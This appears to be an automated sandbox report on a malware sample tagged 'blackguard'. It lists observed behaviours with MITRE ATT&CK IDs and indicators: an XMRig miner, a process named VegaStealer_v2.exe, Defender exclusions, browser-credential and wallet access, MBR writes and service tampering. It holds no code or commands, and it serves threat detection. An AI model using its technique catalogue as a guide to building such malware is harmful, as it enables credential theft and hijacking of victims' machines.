blackguard | 9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

description	pid	Process	procid_target
PID 2560 created 1248	2560	3.exe	21
PID 2560 created 1248	2560	3.exe	21
PID 2560 created 1248	2560	3.exe	21
PID 2560 created 1248	2560	3.exe	21
PID 2560 created 1248	2560	3.exe	21
PID 2384 created 1248	2384	updater.exe	21
PID 2384 created 1248	2384	updater.exe	21
PID 2384 created 1248	2384	updater.exe	21
PID 2384 created 1248	2384	updater.exe	21
PID 1396 created 1248	1396	conhost.exe	21
PID 2384 created 1248	2384	updater.exe	21
PID 2384 created 1248	2384	updater.exe	21

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral1/memory/1084-345-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1084-344-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1084-353-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1084-523-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1084-1167-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1084-1209-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1084-1300-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1084-1467-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1084-1494-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1084-1667-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1084	powershell.exe
1796	powershell.exe
2860	powershell.exe
2232	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\International\Geo\Nation	avg_secure_browser_setup.exe

Executes dropped EXE 23 IoCs

pid	Process
2560	3.exe
2528	VegaStealer_v2.exe
2188	v2.exe
2648	CheatEngine75.exe
2668	CheatEngine75.tmp
2384	updater.exe
1164	avg_secure_browser_setup.exe
2592	avg_antivirus_free_setup.exe
1904	CCleaner.exe
2016	CheatEngine75.exe
2844	CheatEngine75.tmp
348	_setup64.tmp
2872	Kernelmoduleunloader.exe
1380	windowsrepair.exe
1244	avg_antivirus_free_setup_x64.exe
2812	instup.exe
1304	instup.exe
2468	CCleanerSetup.exe
2336	sbr.exe
2780	CCleaner64.exe
2028	CCUpdate.exe
1200	CCleaner64.exe
3008	CCUpdate.exe

Loads dropped DLL 64 IoCs

pid	Process
2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
2528	VegaStealer_v2.exe
2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
2648	CheatEngine75.exe
2188	v2.exe
2188	v2.exe
2188	v2.exe
2188	v2.exe
2188	v2.exe
2188	v2.exe
2188	v2.exe
2668	CheatEngine75.tmp
2236	taskeng.exe
2668	CheatEngine75.tmp
1164	avg_secure_browser_setup.exe
2668	CheatEngine75.tmp
1164	avg_secure_browser_setup.exe
2668	CheatEngine75.tmp
1164	avg_secure_browser_setup.exe
2668	CheatEngine75.tmp
1904	CCleaner.exe
2016	CheatEngine75.exe
1164	avg_secure_browser_setup.exe
1164	avg_secure_browser_setup.exe
1164	avg_secure_browser_setup.exe
1164	avg_secure_browser_setup.exe
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2844	CheatEngine75.tmp
2592	avg_antivirus_free_setup.exe
2592	avg_antivirus_free_setup.exe
1244	avg_antivirus_free_setup_x64.exe
1244	avg_antivirus_free_setup_x64.exe
1244	avg_antivirus_free_setup_x64.exe
1244	avg_antivirus_free_setup_x64.exe
1244	avg_antivirus_free_setup_x64.exe
1244	avg_antivirus_free_setup_x64.exe
1244	avg_antivirus_free_setup_x64.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
2812	instup.exe
1304	instup.exe
1904	CCleaner.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2588	icacls.exe
1924	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AvRepair = "\"C:\\Program Files\\AVG\\Antivirus\\setup\\instup.exe\" /instop:repair /wait"	instup.exe

Checks for any installed AV software in registry 1 TTPs 16 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Software\AVAST Software\Avast	avg_antivirus_free_setup_x64.exe
Key opened	\REGISTRY\MACHINE\Software\AVAST Software\Avast	instup.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	instup.exe
Key opened	\REGISTRY\MACHINE\Software\Wow6432Node\AVAST Software\Avast	instup.exe
Key opened	\REGISTRY\MACHINE\Software\AVAST Software\Avast	instup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	avg_secure_browser_setup.exe
Key opened	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\SOFTWARE\AVAST Software\Avast	avg_secure_browser_setup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	freegeoip.app
14	ip-api.com
5	freegeoip.app

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3000	powercfg.exe
1136	powercfg.exe
1748	cmd.exe
1040	powercfg.exe
1584	powercfg.exe
2828	cmd.exe
1076	powercfg.exe
2288	powercfg.exe
2572	powercfg.exe
1920	powercfg.exe

Writes to the Master Boot Record (MBR) 1 TTPs 8 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	instup.exe
File opened for modification	\??\PhysicalDrive0	instup.exe
File opened for modification	\??\PhysicalDrive0	CCleanerSetup.exe
File opened for modification	\??\PhysicalDrive0	CCUpdate.exe
File opened for modification	\??\PhysicalDrive0	CCUpdate.exe
File opened for modification	\??\PhysicalDrive0	avg_antivirus_free_setup.exe
File opened for modification	\??\PhysicalDrive0	avg_secure_browser_setup.exe
File opened for modification	\??\PhysicalDrive0	avg_antivirus_free_setup_x64.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2384 set thread context of 1396	2384	updater.exe	88
PID 2384 set thread context of 1084	2384	updater.exe	94

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1084-331-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-345-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-344-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-353-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-523-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-1167-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-1209-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-1300-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-1467-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-1494-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1084-1667-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Cheat Engine 7.5\include\is-E9D64.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\is-D65IJ.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-F9TUL.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\is-E2RF8.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\is-CJSO3.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-7CAUJ.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-H1V8A.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-1KQS1.tmp	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\Lang\lang-9999.dll	CCleanerSetup.exe
File created	C:\Program Files\CCleaner\libwavmodapi.dll	CCleanerSetup.exe
File created	C:\Program Files\Cheat Engine 7.5\include\is-UQMJL.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\is-LVNGQ.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Common\is-O2IUP.tmp	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\Lang\lang-3098.dll	CCleanerSetup.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\tcc64-32-linux.dll	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\Lang\lang-1087.dll	CCleanerSetup.exe
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\is-P2DDU.tmp	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\Lang\lang-1062.dll	CCleanerSetup.exe
File created	C:\Program Files\Cheat Engine 7.5\include\sys\is-11M9A.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\is-N9NA7.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\languages\is-R53BR.tmp	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\CCleanerDU.dll	CCleanerSetup.exe
File opened for modification	C:\Program Files\AVG\Antivirus\setup\sbr_x64_ais-c62.vpx	instup.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\allochook-i386.dll	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\is-M3FGU.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\tcc\is-2A7O3.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\languages\is-0C2HT.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\is-F4PQR.tmp	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\Lang\lang-1102.dll	CCleanerSetup.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\libmikmod32.dll	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\ceshare\forms\is-8DJ6B.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\ceshare\images\is-PLGRE.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Common\is-FTI1I.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-9VKDI.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-6QOGA.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-BN600.tmp	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\nstall	CCleanerSetup.exe
File created	C:\Program Files\CCleaner\Lang\lang-1025.dll	CCleanerSetup.exe
File created	C:\Program Files\CCleaner\Lang\lang-1061.dll	CCleanerSetup.exe
File created	C:\Program Files\CCleaner\Lang\lang-1086.dll	CCleanerSetup.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\DotNetDataCollector64.exe	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\CCleanerPerformanceOptimizer.dll	CCleanerSetup.exe
File created	C:\Program Files\Cheat Engine 7.5\include\sec_api\is-BNF31.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\is-3DOOA.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\AVG\Antivirus\setup\ais_gui_cef-7cf.vpx	instup.exe
File created	C:\Program Files\Cheat Engine 7.5\include\is-CF0NI.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-1CS5S.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\is-6AURG.tmp	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\libwaresource.dll	CCleanerSetup.exe
File created	C:\Program Files\Cheat Engine 7.5\is-HD9DE.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-G8NFB.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\sec_api\is-NGV4U.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\ceshare\forms\is-2AQ7K.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\AVG\Antivirus\setup\ais_cmp_datascan_x64-82e.vpx	instup.exe
File created	C:\Program Files\Cheat Engine 7.5\is-75EMP.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-31953.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\AVG\Antivirus\setup\Stats.ini.tmp	instup.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\tcc64-64.dll	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\64\is-MA912.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\sys\is-PJ8UG.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\plugins\example-c\is-E1PLI.tmp	CheatEngine75.tmp
File created	C:\Program Files\CCleaner\Lang\lang-1044.dll	CCleanerSetup.exe
File created	C:\Program Files\Cheat Engine 7.5\include\is-5JUEC.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\is-BBTTV.tmp	CheatEngine75.tmp

Launches sc.exe 12 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2028	sc.exe
756	sc.exe
1096	sc.exe
948	sc.exe
1612	sc.exe
3060	sc.exe
1524	sc.exe
2604	sc.exe
332	sc.exe
1688	sc.exe
1036	sc.exe
1968	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Embeds OpenSSL 2 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral1/files/0x000400000001dbee-1546.dat	embeds_openssl
behavioral1/files/0x000400000001dc55-1664.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CCUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VegaStealer_v2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	avg_secure_browser_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CCleaner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CCleanerSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CCUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	avg_antivirus_free_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Kernelmoduleunloader.exe

Checks processor information in registry 2 TTPs 25 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	avg_antivirus_free_setup_x64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	instup.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	instup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	CCleanerSetup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	CCleanerSetup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	instup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	instup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	CCleanerSetup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	instup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	v2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	v2.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	avg_antivirus_free_setup_x64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	instup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	instup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	instup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	instup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	instup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CheatEngine75.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\	CheatEngine75.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	avg_antivirus_free_setup_x64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	avg_antivirus_free_setup_x64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	instup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	instup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	instup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	instup.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
3008	WMIC.exe

Modifies data under HKEY_USERS 28 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Piriform\CCleaner\Brandover = "0"	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Piriform\CCleaner\AutoICS = "1"	CCleanerSetup.exe
Key created	\REGISTRY\USER\S-1-5-19	CCleanerSetup.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Piriform\CCleaner	CCleanerSetup.exe
Key created	\REGISTRY\USER\.DEFAULT	CCleanerSetup.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Piriform\CCleaner	CCleanerSetup.exe
Key created	\REGISTRY\USER\S-1-5-20	CCleanerSetup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Piriform\CCleaner	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Piriform\CCleaner\Language = "1033"	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Piriform\CCleaner\Brandover = "0"	CCleanerSetup.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Piriform	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Piriform\CCleaner\Language = "1033"	CCleanerSetup.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Piriform	CCleanerSetup.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Piriform\CCleaner	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Piriform\CCleaner\Brandover = "0"	CCleanerSetup.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	CCleanerSetup.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Piriform	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Piriform\CCleaner\AutoICS = "1"	CCleanerSetup.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Piriform\CCleaner\AcqSrc = "mmm_ccl_ppi_008_244_m"	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Piriform\CCleaner\AutoICS = "1"	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Piriform\CCleaner\AcqSrc = "mmm_ccl_ppi_008_244_m"	CCleanerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Piriform\CCleaner\AcqSrc = "mmm_ccl_ppi_008_244_m"	CCleanerSetup.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70b0841b9a59db01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Piriform\CCleaner\Language = "1033"	CCleanerSetup.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "2"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "76"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "87"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "77"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "81"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "Updating package: ais_gen_core_x64"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: ais_gen_openssl_x64-7de.vpx"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "55"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "71"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: ais_cmp_gamingmode-875.vpx"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "60"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "67"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Syncer = "92"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "File downloaded: ais_cmp_bpc-7cc.vpx"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Installation_Main = "17"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "Updating package: ais_gen_openssl_x64"	instup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_Description = "Updating package: sbr_x64_ais"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "20"	instup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\AvgPersistentStorage\InstupProgress_UpdateSetup_Syncer = "49"	instup.exe
